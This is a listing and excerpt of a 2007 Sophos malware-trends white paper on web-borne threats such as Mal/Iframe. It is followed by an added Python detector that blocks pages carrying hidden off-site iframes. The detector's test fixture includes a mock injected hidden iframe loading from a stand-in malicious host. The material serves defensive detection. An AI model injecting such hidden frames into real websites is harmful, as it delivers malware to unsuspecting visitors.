Trends in Malware: Sophos Security Threat Report 2008

By: Sophos
Published: Jul 25, 2007
Length: 13
Type: White Paper
Overview:
A sharp rise in web threats is the latest twist in cybercriminals' continually evolving efforts to steal information for financial gain. We review the year so far and predict the threat landscape for the second half of 2007.
Related categories: Anti Spam, Anti Spyware, Anti Virus, Email Security, Intrusion Prevention, Microsoft Exchange, Network Security

The first six months of 2007 continued 2006's trend of rapidly mutating virus and spam campaigns. Small targeted attacks were favored rather than the large-scale, high-profile attacks of a few years ago. The web in particular continued to be a growing and significant source of threats, being overrun with Trojans, spyware and adware, potentially unwanted applications and undesirable websites.
25 years ago, the first virus (called Elk Cloner) was written by a 15-year-old prankster to infect Apple II floppy disks and display a poem every 50th computer boot. Since then, things have changed somewhat. By June 2007, Sophos was protecting against 257,313 threats, 49,629 of them new since the end of December 2006. The motivation continued to be financial – spyware-infected websites, spammed email and traditional desktop threats all aimed at stealing confidential information or generating income. Increased flexibility in working practices, new and more complex operational threat methods, and a raft of new scams have continued to place a heavy burden on businesses. New laws are being applied with increasing vigor, but once again the threat landscape remains challenging for the months ahead.

Web threats on the rise
The biggest change we have seen over the last three years is the rise in the web as a significant weapon in the cybercriminals' armory. Now an indispensable business tool, the web is still a relatively unprotected route to the users' desktops and laptops. Once infected, these compromised computers can be used to steal confidential data and trade secrets or to spam out millions of emails.
The real change is the way in which users' computers are infected. Previously, virus writers relied on a user downloading an infected file (which would probably have been detected and blocked by desktop anti-virus anyway). Infected email attachments sent directly to users proved to be the bigger threat. Today, spyware and other malware is placed on a website and users are lured to the compromised webpages via spammed email invitations. The type of website is immaterial: gardening and cookery websites are as likely to be infected as gambling or pornography sites.
Top of the list of web-based threats in January to June 2007, accounting for nearly half the world's infected webpages, is Mal/Iframe. It works by injecting malicious code into web pages and is a perfect example of a prolific web threat that targets vulnerable sites.
Interestingly, Sophos research shows that only about 1 in 5 infected websites is malicious by design: about 80 percent of all web-based malware is being hosted on innocent, but compromised, websites.
Because many threats are specifically designed to attack web-related files – such as HTML, ASP, JS and VBS – an infection on a web server can affect hundreds or even thousands of web files. These in turn may form part of hundreds of different webpages published from the same server. This volume, coupled with the speed with which the code can be subtly altered and downloaded, is what makes this threat vector so significant.
Organizations need to apply the same structured, routine security measures at the web gateway, at the email gateway, and at their desktops and servers. The first step is to educate users so that they understand the threat, surf the web safely and preserve the integrity of their organization. After that there are three important areas.

Block by content
A secure web defense will scan pages for malicious content, regardless of whether or not the site is one that you would normally consider "safe". On-access scanning for malware helps prevent infection in the first place and also prevents already-infected files from being used, while stopping you from accidentally serving up malicious content. This has to be an ongoing process as infected sites do get cleaned, not just by administrators but also sometimes by the hackers themselves removing their malicious code before it is detected.
In all this, speed is paramount. Phishing and spam websites are often created and dismantled in a matter of hours. Their purpose is to catch visitors without alerting the authorities or being blocked by security products. Sophisticated automated analysis, such as techniques which take a fraction of a second to look for thousands of clues, allows reputable security vendors to block access to suspect and misleading webpages very quickly.
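The content-based check described above, as an added example that is not taken from the Sophos report: it inspects a fetched page body for the kind of injected, hidden, off-site iframe the text attributes to Mal/Iframe and returns a block/allow verdict that does not depend on whether the site is one you would "normally consider safe". The hiding heuristics, the host names and the two sample pages are constructed for illustration and are not real sites or vendor detection logic.

```python
"""Content-based scan of a web page for injected hidden iframes.

Added example, not code from the Sophos report. The page is judged on
what it contains, not on the reputation of the host serving it.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re


class _IframeCollector(HTMLParser):
    """Collect the attribute dictionaries of every <iframe> in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


# Assumed heuristic: a frame counts as hidden when it has no visible area,
# is styled invisible, or is positioned far outside the viewport.
_ZERO_DIMS = {"0", "1", "0px", "1px"}
_HIDDEN_STYLE = re.compile(r"(display:none|visibility:hidden|width:[01]px|height:[01]px)")
_OFFSCREEN_STYLE = re.compile(r"(left|top):-\d{3,}px")


def _is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    width = attrs.get("width", "").strip()
    height = attrs.get("height", "").strip()
    if width in _ZERO_DIMS or height in _ZERO_DIMS:
        return True
    return bool(_HIDDEN_STYLE.search(style) or _OFFSCREEN_STYLE.search(style))


def scan_page(html, page_host):
    """Return one finding per hidden iframe that loads content from another host.

    A relative src (no hostname) is treated as same-site and not reported.
    """
    collector = _IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host
        off_site = host.lower() != page_host.lower()
        if off_site and _is_hidden(attrs):
            findings.append({"src": src, "reason": "hidden iframe to off-site host"})
    return findings


def verdict(html, page_host):
    """'block' if the page body carries an injected hidden frame, else 'allow'."""
    return "block" if scan_page(html, page_host) else "allow"


# Constructed sample pages: the same innocent gardening site, once clean and
# once after an attacker has injected a hidden frame (hostnames are fictional).
SITE_HOST = "www.example-garden.test"

CLEAN_PAGE = """<html><body><h1>Gardening tips</h1>
<iframe src="https://www.example-garden.test/calendar" width="400" height="300"></iframe>
</body></html>"""

INJECTED_PAGE = """<html><body><h1>Gardening tips</h1>
<iframe src="http://malicious.example/loader" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, verdict(page, SITE_HOST), scan_page(page, SITE_HOST))
```

Because the decision rests on the page body, the injected copy of the gardening page is blocked while the clean copy of the very same site is allowed; a reputation list keyed on the hostname would treat both identically.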
